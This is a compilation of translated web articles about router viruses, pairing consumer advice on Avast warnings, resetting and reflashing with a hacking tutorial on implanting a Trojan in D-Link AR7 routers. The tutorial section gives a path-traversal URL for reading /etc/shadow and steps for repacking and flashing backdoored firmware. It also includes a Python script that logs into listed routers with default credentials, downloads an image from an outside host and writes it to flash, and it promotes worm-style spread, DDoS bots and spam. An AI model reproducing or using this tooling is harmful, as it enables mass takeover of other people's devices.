Avast writes that the router is vulnerable, infected, and configured incorrectly. Virus in the router - malicious DNS
This may seem strange to you, but there are viruses that infect not computers, laptops, or mobile devices, but routers.
Why do this? Then, although your router does not store any valuable information, access to this device will allow you to change the DNS server settings. This, in turn, will allow scammers to forward some of your requests to fake sites, where you will enter sensitive information useful to the scammers. Many router models are susceptible to infection; it makes no sense to give a list, since it can be constantly updated. For your safety, I recommend with recommendations that will allow you to avoid infection.
How does the virus work?
Your computer becomes infected with a virus called Win32.Sector. That, in turn, downloads Trojan.Rbrute from a special server, which searches for routers on the network and tries to gain access to the configuration. After gaining access, he changes the current DNS addresses registered in the router to his own. Then, all devices connected to the router end up on the page from which Win32.Sector is downloaded.
- The “Internet” icon is lit, but you can’t get to most sites or the wrong sites load that you wanted to open
- Strange websites open spontaneously
- The computer cannot obtain an IP address from your network (it is assigned an address like 169.254.xxx.xxx of the Microsoft subnet)
How to remove Trojan.Rbrute virus from a router?
- First, you need to reset your router to factory settings. To do this, press the “Reset” button on the back panel of the router and wait 10 seconds until the router blinks all the indicators and reboots.
2. Go to the admin panel of the router and change the standard password for access to the admin panel to your own, preferably a more complex one.
3. We configure the router again, check whether the Internet is working properly.
4. From the official website of the router manufacturer, download the latest firmware for your model and flash it. Most likely, in the latest firmware version, the holes through which attackers gained access to the router settings are closed.
5. After this, we check the computer for malware to exclude the possibility that WinSector or Trojan.Rbrute remained on the computer’s hard drive. You can do this using free tools from the article.
I hope my article helped you =)
Until recently, I didn't even know that Avast router scares its users with "scary" warnings regarding their routers. As it turns out, Avast antivirus scans Wi-Fi routers. It gives results that the router is not configured correctly, the device is vulnerable to attacks, or in general that the router is infected and infected, and attackers have already intercepted DNS addresses and are successfully redirecting you to malicious sites, stealing credit card information and everything is very bad in general. All these warnings, of course, are seasoned with a dangerous red color and confusing instructions that even a good specialist without beer will not understand. I'm not even talking about ordinary users. This is what the problems found on the D-Link DIR-615 router look like:
The device is vulnerable to attacks:
The solution is, of course, updating the router firmware. Because what else 🙂 Avast can also display a message that your router is protected by a weak password, or the router is not protected from hacking.
In some cases, you may see a message that your router is infected, and connections are redirected to the malicious server. Avast antivirus explains this by saying that your router was hacked and its DNS addresses were changed to malicious ones. And there are instructions for solving this problem for different routers: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemco.
In short, all these recommendations are aimed at checking DNS addresses and DNS-related services. Through which attackers can change the DNS on your router and redirect you to their malicious sites. There are detailed instructions on how to check everything on routers from different manufacturers.
How to respond to warnings from Avast about a router vulnerability?
I think this question interests everyone. Especially if you came to this page. If you are wondering how I would react to such warnings from the antivirus, then the answer is simple - not at all. I am sure that Avast would have found holes in my router through which I could be hacked. I just have Dr.Web. He doesn't do such checks.
Maybe I'm wrong, but no antivirus other than Avast checks the Wi-Fi routers you are connected to for various types of vulnerabilities. And this feature, called Home Network Security, appeared back in 2015. In Avast 2015 version.
Avast scans your router for device security issues. Although, I don't fully understand how he does it. For example, how does it check the same password for entering the router settings. Does it follow the user, or is it a selection method? If you guess it, the password is bad 🙂 Okay, I’m not a programmer.
Personally, I believe that all these warnings are nothing more than simple recommendations to strengthen the security of your router. This does not mean that someone has already hacked you and is stealing your data. What Avast offers:
- Set a good password and update the router firmware. They say otherwise you may be hacked. Ok, this is already clear. This doesn't have to be signaled as some kind of terrible vulnerability. Although again, I don’t understand how the antivirus determines that the router software version is outdated. It seems to me that this is impossible.
- The router is not protected from connections from the Internet. Most likely, this warning appears after checking open ports. But by default, the “Access from WAN” function is disabled on all routers. I highly doubt that anyone will hack your router over the Internet.
- Well, the worst thing is the substitution of DNS addresses. If any problems with DNS are detected, Avast directly writes that “Your router is infected!” But in 99% of cases this is not the case. Again, almost always the router automatically receives DNS from the provider. And all functions and services through which attackers can somehow spoof DNS are disabled by default. It seems to me that very often the antivirus misunderstands some user settings.
Something like this. Of course, you may disagree with me. It seems to me that it is much easier to access the computer directly and infect it than to do it with the router. If we are talking about an attack via the Internet. I will be glad to see your opinion on this matter in the comments.
How to protect your router and remove the warning from Avast?
Let's try to figure out each item that Avast most likely checks and issues warnings.
- The router is protected with a weak password. No encryption. In the first case, the antivirus has a password that you must enter when entering the router settings. Typically, the default password is admin. Or not installed at all. And it turns out that everyone who is connected to your network can go into the router settings. Therefore, this password needs to be changed. I wrote how to do this in the article: . As for the Wi-Fi network password, it must also be strong, and the WPA2 encryption type must be used. I always write about this in instructions for setting up routers.
- The router is vulnerable due to old software. This is not entirely true. But, if there is new firmware for your router model, then it is advisable to update it. Not only to improve security, but also for more stable operation of the device and new functions. We have instructions on our website for updating software for routers from different manufacturers. You can find it through the search, or ask in the comments. Here it is for .
- DNS settings have been changed. The router is hacked. To be honest, I have never seen such cases before. As I wrote above, all services through which this can happen are disabled by default. Most often, the router receives DNS from the provider automatically. The only thing I can advise is not to manually enter DNS addresses that you are not sure about. And if you manually specify addresses, it is better to use only DNS from Google, which: . This is also recommended in Avast recommendations, which can be viewed on the official website:. There are detailed instructions for solving DNS problems for almost all routers.
That's all. I hope I was able to at least a little explain these warnings in Avast antivirus. Ask questions in the comments, and don’t forget to share useful information on this topic. Best wishes!
In light of the increasing number of cases of DNS substitution by malware on Internet users’ devices, the question of the security of Wi-Fi routers arises. How to check a router for viruses? How to remove a virus from a router? The question is complex and simple at the same time. There is a solution!
The virus itself cannot record itself on most modern routers due to the small space in the memory of the router itself, but it can zombify the router to participate in a botnet. As a rule, this is a botnet for attacking various servers, or for redirecting and analyzing the flow of information leaving you on the Internet.
Your passwords and personal correspondence could fall into the hands of attackers!
This needs to be fixed as quickly as possible.
- Resetting the router
- Router firmware
- Resetting
Resetting the router
You can reset the router settings by pressing the reset button. Usually this button is located on the back of the router, where the LAN ports are. Usually the button is recessed into a hole to avoid accidental pressing, so you have to use a toothpick. This will delete the router settings changed by the virus and install the factory settings in their place. I must warn you that if you do not know how to configure a router, then reset its settings for you not worth it!
Router firmware
Sometimes the virus "floods" modified firmware to the router. To remove virus firmware from the router, you can flash the router again.
Connect the computer to the router with a LAN cable. A LAN cable is included with any router. Or via Wi-Fi if a cable connection is not possible. It's better to connect with a cable! The wireless connection is considered unstable and is not suitable for updating the router firmware.
After we have connected to the router, open the browser (Chrome, Opera, Mozilla, IE) and enter the address of the ASUS router into the address bar, for Asus it is 192.168.1.1, on the page that opens you will need to enter your login and password to enter the router settings. Login: admin, Password: admin. If the login and password do not match, then ask the person who set up the router for you, perhaps he changed them.
Download the firmware from the manufacturer's website and select the firmware on the disk using the router settings page. For the vast majority of routers, the firmware steps are the same.
Hello my reader! In this article I will talk about great ADSL routers
– pieces of iron that are indispensable in home and industrial networks. I'll tell you about the question
exploitation of these glands for purposes beneficial to us - sewing in brutal
Trojan inside the router. And in such a way that no one would notice
a smart admin, not a smart user.
Wishes or IQ requirements
When I wrote this article, I assumed that reading it would be enough
advanced user with GNU\Linux installed, who also has some skills
work and programming in this operating system. However, it seems
it is possible to repeat my steps on Windows (using Cygwin, for example), but
this will not be described. To get maximum pleasure you also need
soldering iron skills (this is optional).
And it all began...
Somehow I got distracted. So, it all started when this same one hung up one day
piece of hardware, or rather, it treacherously cut off the connection to the Internet and did not
I wanted to restore it. At the same time, she was far away, physically accessible
I wasn’t there to see her (however, I was somehow lying - I was just too lazy to get up from the sofa
reboot the router :)), the Web interface did not respond, but I remembered that on
This thing should have telnet or ssh. Login to the administration area
have not tried before and recklessly did not change the password to my account (as
It turned out later, very in vain, because by default it is “admin:admin”). So I
tried SSH and it worked!
$ssh [email protected]
$Password:
Like a bolt from the blue! BusyBox! I never thought about under whose
This router is controlled, it turns out – GNU/Linux! I felt terrified
I wonder how everything works here, and, mentally thanks to laziness and chance, I
went into research.
Collection of information
So where did I start? Of course, from the list of available commands:
#busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes
The set is quite reasonable, enough for normal research and implementation of ideas.
Next, interest in the kernel version awoke:
# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006
For reference: MontaVista is a distribution aimed at embedded
systems. The vast majority of network equipment manufacturers provide
preference for this system. It can also be found on other devices, for example, in
e-books or cell phones.
# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
processor
: 0
cpu model
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
wait instruction: no
microsecond timers: yes
extra interrupt vector: yes
hardware watchpoint: yes
VCED exceptions: not available
VCEI exceptions: not available
AR7 is a dual-core chip developed by Texas Instruments. He
contains a full-fledged ADSL router on a single chip that supports ADSL1 standards,
ADSL2,ADSL2+. Based on high performance RISC processor MIPS 4KEc, with
clock frequency 175 or 233 (depending on production technology: 18 microns
or 13 µm). The chip contains 2 UART interfaces on board, one of which (UART_A)
used to output debugging information, as well as an EJTAG interface that serves
for debugging (firmware) Flash memory. The use of these interfaces will be discussed
described below.
Finally, I looked at the memory information:
# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev: size erasesize name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Naturally, without forgetting about the block addresses:
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
From the above it follows that Flash memory (/dev/mtdblock) has 5 blocks:
mtd0– image of the SquashFs file system. This is a special file
a system that is compressed and read-only. For
compression algorithm gzip is used, but in this case - LZMA (compression ratio
higher). The size of this block is 4 MB.
mtd1– this block contains the MontaVista core compressed with the LZMA algorithm
condition, block size 600 KB.
mtd2– Bootloader ADAM2, loads the kernel, also has
service FTP server for recovery and flashing. There will be more details about it
stated further. The block size is 64 KB.
mtd3– divided between configuration data and environment
(environment variables) block, which you can look at in /proc/ticfg/env.
Configuration data is located in /etc/config.xml. Intermediary between file
system, the configuration block is closed (like all cm_*, control, o
them later) program cm_logic. The size of this block is also 64 KB.
mtd4– this contains the firmware signature, kernel and file image
systems. This block is used when updating the firmware via the Web interface.
Initially it is stored in this block, then the checksum is checked
and, if it fits, he signs up for his new place.
RAM (16 MB in this model, but ADAM2 in this model
sees only 14 MB, is cured by updating), mounted to the /var directory, and its
You can easily use it for our purposes:
# free
total used free shared buffers
Mem: 14276 10452 3824 0
Let's not forget to go through the list of processes. Of the interesting ones lurking here
daemons: thttpd - Web-server; dproxy - proxy server caching DNS requests; ddnsd
- DNS daemon; pppd... is the actual daemon that implements the connection via the protocol
PPP, and in the parameters we see account information. So, if the router is not
pretends to be a hose (read – not in bridge mode), then you can
easy to get an account.
The cm_* programs are closed and the source code already includes
compiled (these programs are also developed by Texas Instruments, on D-Link
There is no point in quarreling over non-compliance with licenses).
cm_logic– a program that controls the logic of the system, through it
configuration is in progress; synchronizes /etc/config.xml with
corresponding part of the contents of /dev/ticfg (pointing to mtd3).
cm_cli– command line interface for management and configuration
systems. For example, connection settings are made through this interface.
cm_pc– launches and monitors processes, connections with rules
(for example, run the program as a daemon; the rules also include information about
open ports) described in /etc/progdefs.xml; loads immediately after
kernels.
webcm– CGI interface, leaky, for example allows you to look at /etc/shadow,
simply by accessing the URL.
http://192.168.1.1/../../../etc/shadow
I didn’t get anything, thttpd is not so simple, but if so:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Another thing. This can be used to collect information if there is no access to
ssh/telnet, but there is access to the Web interface.
firmwarecfg– used for flashing firmware via the Web interface. At the entrance
of this program, an image is transferred with a POST request from the Web interface, and it already
redirects to Flash memory after first checking the image checksum.
At this point, the collection of primary information is completed, it’s time to move on to decisive
actions.
Installing development tools and compiling firmware
Firmware for D-Link routers (and all others based on GNU/Linux)
distributed under the GPL license, you can get them on the official
FTP server. In fact, you can choose any of the list of proposed firmwares,
they are the same (regarding the T-series). The delivery includes the source code of the kernel, environment,
necessary tools and toolchain for developing/compiling existing ones
programs. It should be unpacked to the root and added to the environment variable
PATH path to the toolchain bin directory:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/
Now, to compile your own firmware, go to the directory
with the source codes and run this same make.
$ cd DSL/TYLinuxV3/src && make
There will be a lot of questions asked about enabling device support (better
answer them positively). After compilation is complete, in the TYLinuxV3/images directory
Firmware images will be created. You can also run a script with the same name as yours
model from the /TYLinuxV3/src/scripts directory.
A few words about transferring files between the router and computer. The very first
the method I used is the ability to transfer files via the SSH protocol,
using the scp program for this. But a little later I found out that mc (Midnight
Commander) also has the ability to connect via SSH (Panel -> Shell connection).
Alternatively, you can set up a Web or FTP server at your workplace. Later I
I gave preference to the Web server, because it works the most quickly. I installed it
thttpd, small and fast, just like on a router. We launch it at home and download it to
router file, after going to the /var directory (it, as mentioned
earlier, available for recording).
$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2/file
To download a file from the router, you can also raise the Web-server:
# thttpd -g -d /var -u root -p 8080
Please note that if you want to download an executable file from the router, you should
remove launch rights. When downloading a large number of files from the router
It's better to use mc, you won't need to copy files to /var first and
remove rights, and then delete these files to free up space. In general, the matter
taste, choose any option that is convenient for you.
Creating your own program
Let's start, of course, with a programming classic - HelloWorld. Some special ones
there are no rules. The text of the program is painfully familiar:
#include
#include
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
return 0;
}
Compiling (the path to the toolchain must be specified in the environment variable
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell
# cd /var
# chmod +x hell
# ./hell
And... nothing will happen, or the path not found notification will appear. What is it
case? I have already talked about cm_pc - this program launches others in
according to the rules described in /etc/progdefs.xml. Now the time has come
modify and flash file system images.
File system modification
In order to modify the file system, you first need to
unpack. As I already mentioned, the file system here is SquashFs with the LZMA patch.
The firmware development package includes only the mksquashfs program (for creating
image), unsquashfs (for unpacking) is missing. But it doesn’t matter, everything is available
on the file system website, we need the first version. By applying the LZMA patch and
Having collected the utilities, we put them aside in a convenient place. First we get the image
file system from the router:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Now you can modify it as you like, and we can send it to FuckTheWorld
/bin directory and add a rule to run in /etc/progdefs.xml.
$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
And we add this (between the tags
Save and pack back:
$ mksquashfs unpacked_fs my_fs.img -noappend
Please note that the file system image should not exceed
acceptable sizes. If you feel the urge to try something urgently, and it doesn’t
fits, remove anything “unnecessary” from the image like grep, whoami, or
use the UPX executable file packer. Now download it to the router
image and move on to the next section.
Recording a file system image
The method for flashing a router is very simple; it involves accessing the device
/dev/mtdblock/*. So, upload the file image to the router in any convenient way.
system and perform this simple action:
# cat my_fs.img > /dev/mtdblock/0 && reboot
# cp my_fs.img /dev/mtdblock/0 && reboot
After some time, when the recording process has completed, the router will reboot, and
the changes will take effect. Let's try to run our example:
# hell
Mate.Feed.Kill.Repeat.
Recovery methods in case of failure
Before flashing your router with more serious “crafts,” you should find out how
to act in critical cases when the router refuses
load. There are no hopeless situations. ADAM2 FTP server comes to the rescue. For
First, you should launch an FTP client to the ADAM2 IP address, which you can spy
in /proc/ticfg/env (my_ipaddress parameter).
$ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.
For clarity, you can turn on debug mode, then all
information and all FTP responses:
Login/password – adam2/adam2. The flashing process is very simple. To start
switch the FTP session to binary mode:
ftp> quote MEDIA FLSH
Now we send, for example, an image of the file system and indicate the location
destinations:
ftp> put fs.img "fs.img mtd0"
We wait for the end of recording, reboot the router, exit the session:
ftp> quote REBOOT
ftp> quit
All! As you can see, there is nothing complicated, now if something goes wrong, you
you can always fix the situation.
For ease of use, you should give a normal IP address, enable
automatic loading (so as not to dance with reset) and slightly increase the time
waiting for connection before loading the kernel. All these parameters are stored in
environment variables, there are special FTP ADAM2 commands: GETENV and SETENV (for
get and set the variable respectively). In the FTP session enter the following
commands:
ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp> quit
The router reboots and you can access ADAM2 at 192.168.1.1:21. If
there will be a desire to reflash the kernel image, and the kernel will refuse to boot, FTP
will start on its own. Before flashing modified images, be sure to
save the current ones for restoration. In general, you can change environment variables
and via /proc/ticfg/env, I just wanted to tell you more about working with FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
You can check the changes like this:
# cat /proc/ticfg/env | grep my_ipaddress
What to do if you want to try to reflash the bootloader, and how
what to do in case of failure? Or the router for some reason does not start, and
no access to ADAM2? There is a solution - JTAG, or rather, this chip contains EJTAG
(extended version). This is an interface for in-circuit debugging/programming.
To connect to this interface we need a computer LPT port,
connectors and 4 resistors. The scheme is simple.
I hasten to note that firmware via JTAG is not a quick task, it will take quite a lot
a lot of time. So it should only be used to restore the bootloader,
even if it doesn't work. To communicate via JTAG, you should use a special
program, for example UrJTAG. Below is an example of how this interface works.
Connection setup:
jtag> cable parallel 0x378 DLC5
jtag> detect
Flash Memory Detection:
jtag> detectflash 0x30000000 1
Reading Flash Memory:
jtag> readmem 0x30000000 0x400000 fullflash.img
Write to memory (bootloader):
jtag> flashmem 0x30000000 adam2.img
It is also useful to know about the UART interface (I previously promised to talk about it). IN
UART_A reports, that is, logs the bootloader (at an early stage of booting from
you can communicate with him) and the core. When writing modified kernels this
indispensable for debugging. UART - Universal Asynchronous Receiver/Transmitter
(universal asynchronous transceiver) is almost always present on
microcontrollers.
The adapter circuit is very simple. Based on only one chip -
TTL level converter: MAX232 for COM and FT232R for USB. Microcircuits
They are quite common and there will be no problems with the purchase.
The circuit is assembled on a breadboard (which can easily be placed in a case
COM port connector) in 20 minutes and brings a lot of benefits. For example, when debugging
kernels are an absolutely irreplaceable solution. What if electronics are a problem? Exit
are USB cords for old phones, they just have a converter
UART - USB.
Some distribution ideas
Having your own proxy/sox on someone else’s router is great. Just like spamming
router for all protocols. This is not a Windows computer, which
rearranged every month :). Routers are often not changed or reflashed. Yes and
Who else besides us would even think of the idea of infecting a router?
Don’t forget, we have control over all traffic from the user/network. For more
In powerful routers it is already possible to hang a DDOS bot. Hide file/hide process,
intercept writing to mtd blocks without overwriting our program - all that
whatever!
Let's say you're about to start writing a serious program for a router.
Very good debugging is important, you will probably have to do it a bunch of times
rewrite/restore images... This is a very sad prospect. Even hands
drop a little, if you also take into account that the rewriting resource of Flash memory
is small (more details in the documentation for the memory chip), and there is a prospect
ruin her. But there is a way out! Qemu can emulate AR7! Can you imagine what
does it provide opportunities and unlimited convenience? Now nothing stops us
write something incredibly cool!
So. You wrote a program, tested it on your own or 1-2 other people’s routers, but
the whole network is still ahead, manually infecting it is a chore, on the 10th router you already start
curse the whole world, and the strings of “cat” and “mtd” float in your eyes. Let's write
a program to automate these routine actions. I chose the python language.
The work plan is as follows:
- compile a list of routers, for example, using nmap;
- the script should take IP addresses from the list in order, enter through
telnet with standard login/password; - then the same steps: upload the modified image,
rewrite, reboot.
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()
The logic of the script is very far from ideal, now I’ll explain why. For
First, you should check the firmware/kernel version and router model, because there may be
serious differences in work. Next, instead of firmware blanks, you should download
file system image from the router, unpack, modify and send
back. This will eliminate problems arising with compatibility in different
models/firmware versions, because stability of operation is the most important thing for you.
Also, a virus can have the functions of a worm, and if you wish, you can always
attach a network scanner, brute force for RDP and similar features to it.
There is another great way to distribute. Nothing stops you from writing
program for Windows, which you will have with you (or download from your
server) file system image and infect the router with it, if present.
Distribute this program in all "standard" ways: removable drives,
exploits for programs, infection of other programs... By combining these methods,
You can create a serious pandemic. Just imagine this picture - after all
Such devices are ubiquitous.
Router protection
Having dug all this out, I thought: how can I protect the router? And then, you see, and
I'll get there myself. The first step is to change the user password to a more complex and
long (limit 8 characters), change banners and service greetings
(hex editor, or, preferably, recompile programs) in order
nmap or other scanners could not determine service versions.
You should also change the ports on which the daemons hang. This is done by
modifications to progdefs.xml. Kill telnet (the easiest way to guess the password, yes
and the protocol is unprotected, why do we need it), enable the firewall, allow the connection
access services only from your own IP or MAC address. Also use a firewall
to protect a network or computer, it’s not for nothing that it’s present. Smart setup
rules will always help you protect yourself.
Conclusion
Many, not only D-Link routers and other similar devices are built on
AR7 chip, the list includes Acorp, NetGear, Linksys, Actionec... Quite
This AR7 is popular along with MontaVista. It follows that, using the same
toolchain, you can carry out the steps described in the article without any problems.
Think about it: in addition to harmful actions, you can also do something useful/pleasant for yourself
and others (I don’t argue, the pleasure of hacking cannot be replaced, but still).
You can make your own firmware, for example, more powerful routers that can
download/distribute torrents... All models have a USB 1.1 interface, but in the younger ones
models it is not soldered. Add a USB module and a file system driver to the kernel,
equip the router with Flash memory - and in the end you get a kind of network storage for
small money. There are a lot of options, but ideas should arise in the thousands - not
limit yourself, create and create!
Problems when distributing Wi-Fi using a router arise for various reasons. One of them is infection of the distribution device with a virus, which you can get rid of yourself.
- a virus that slows down the speed of the Internet in various ways. For example, such malicious software messes up the firmware settings or starts downloading some advertising virus content onto the computer;
- a virus that replaces website addresses. It looks like this: a user goes to any known safe site, and the virus changes the DNS in such a way that the user ends up on an advertising site or sees advertising banners where the site owners did not place them. Such a virus is also dangerous because it can redirect you to a site containing other viruses.
In any case, if you notice that your router is not working correctly, you should check it for viruses, especially since it is very easy to get rid of them.
How does a virus get into a router?
The router provides the Internet to all devices connected to it. This means that all devices and the router itself are on the same home network. This is what the virus takes advantage of: it gets onto the computer from some website or downloaded file, and then it is transmitted over the network to the router, where it begins to play dirty tricks. The process depends on the model of the virus, for example, some malware does not specifically detect itself on the computer, but only begins to act once it gets into the router, while others manage to harm both the operating system and the router’s firmware at the same time.
Checking the router
Before cleaning your router from viruses, you need to check if there are any on it. To find out the result, you need to use the Internet directly through your computer. That is, remove the WLAN cable or modem from the router and insert it into the computer port, and then follow these steps:
If you are having problems with speed, then follow these three steps.
- Check your internet speed. This needs to be done in order to find out in the future whether the speed is the same when using the network directly and through a router. For example, you can download a file or use the special online service Speedtest.
We scan the Internet speed through the Speedtest website
- To more accurately determine the signal quality, you need to find out the ping indicator. Ping is the time it takes for a signal to be sent from your device, reach the server and return back. Naturally, the larger it is, the worse it is for you. Open a command line, enter the ping ip command and run it. IP address of your connection, the default is usually 192.168.0.1, but may vary. Remember the result. A normal ping value of up to 40 ms is an excellent indicator, 40–110 ms is a normal average value, more than 110 ms is worth thinking about reconfiguring the network, improving the signal or changing the provider.
Execute the ping ip command
- After the list of sent packages, you will see statistics. You are interested in the line “Packets”, it calculates how many packets were sent, lost, completed. If the number of lost packets exceeds 5%, you need to find out what the problem is. If a large number of packets do not reach the server or return, this will greatly affect the speed of the Internet.
Let's see what percentage of packets are lost
After you have completed all the above steps, get detailed information about ping, the number of lost packets and Internet speed, reconnect the WLAN cable or modem to the router and check all the same indicators when connecting via Wi-Fi. If the parameters are approximately at the same level, then the problem does not lie in the router, perhaps the reason is on the operator’s side. Otherwise, if problems with the Internet occur only when using it through a router, you need to reset the settings and clean it from viruses.
Virus removal
To remove the virus, you need to reset the settings to default values. If the virus managed to damage the firmware, you will have to install it again yourself.
Reset settings
- Find the Reset button on the back of the router. Usually it is smaller than all the others. It needs to be pressed for 10–15 seconds. When the router turns off and starts to reboot, you can release it. Rebooting the router will notify you that the settings have been reset. Please note that the password you set will also be lost.
Press the Reset button
- To reconfigure the router, you need to connect it to your computer via cable, and then open your browser and go to http://192.168.0.1. Perhaps the address will be different; you can find it on a sticker located on the router itself, or in the documentation that came with the router. You will be asked for a login and password, the default login is admin, and the password is admin or 12345. More details are described in the instructions for the router.
- Go to Quick Setup. Specify the options that suit you. If you want, set a password and change the network name. After completing the setup procedure, save the changes and reboot the router.
Go to the “Quick setup” section and set convenient settings
After completing all the above steps, check if you got rid of the error. If not, you will have to reflash the router manually.
Reflashing the router
Router firmware is only possible if the device is connected to the computer via a cable. You cannot update the firmware over Wi-Fi.
- There is a sticker on the back of the router. Find your router model on it. It also contains information about the firmware version installed initially. If its version is 7, then it is better to install the update for version 7 to avoid a conflict between too new firmware and the old hardware of the router.
Find out the firmware version and router model
- Go to the manufacturer's website and use the search bar to find the desired version for your model. Download it to your computer.
Find and download the required firmware version
- The downloaded file will be archived. Extract its contents to any convenient folder.
How to protect your router from viruses in the future
The only way to protect your router from viruses is to prevent them from entering your computer. Your computer is protected using an antivirus. Install and under no circumstances disable any modern antivirus. It is almost impossible to catch malicious software with an activated antivirus. It is not even necessary to use paid security programs; nowadays, high-quality free analogues are sufficient.
What to do if nothing helps
If following all the above instructions did not bring the desired result, there are two options left: the problem arises due to a breakdown of the physical part of the router or errors on the provider’s side. First, you should call the company that provides your Internet and tell them about your problem and the methods that have not helped solve it. Secondly, the router should be taken to a special service so that it can be examined by specialists.
Infecting a router with a virus is a rare occurrence, but dangerous. There are two ways to get rid of the virus: by resetting the settings and updating the firmware. You also need to make sure that no malware remains on your computer.
